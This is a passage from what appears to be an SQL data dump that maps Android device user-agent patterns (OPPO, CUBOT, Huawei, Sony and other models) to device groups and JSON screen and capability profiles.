8.*; CPH1831) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1837) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1851) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1853) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1859) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1877) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1879) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1893) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1901) AppleWebKit/* (KHTML, like Gecko) Chrome','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1903) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1905) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1909) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1912) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CUBOT A5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CUBOT J3 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CUBOT R11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CUBOT_J3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CUBOT_NOVA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CUBOT_P20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CUBOT_POWER) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CUBOT_X18_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Capture+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Core-X3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; D6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DRA-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DRA-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DRA-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DRA-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DRA-LX5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUA-L22) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUA-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUA-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUB-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUB-AL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUB-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUB-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUB-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; DUK-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Digi C1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Digi R1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Digi_K1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Doppio DP355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E465GO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E475) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E500A_2019) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E503F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E601F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; E6910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; EAGLE_961) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; EASY5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; EASY55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ECHO_DUNE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ECHO_FUSION) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; EDI-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ELEGANCE 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ELEMENT MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ELEMENT PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ELEMENT_PRO_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; EML-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; EML-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; EVA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; EVA-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; EVA-DL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Element 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Elite M45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Elite M5Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Elite T4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Elite T55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Elite xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Expanse) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F-01L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F-04K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F1x4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F5121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F5122) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 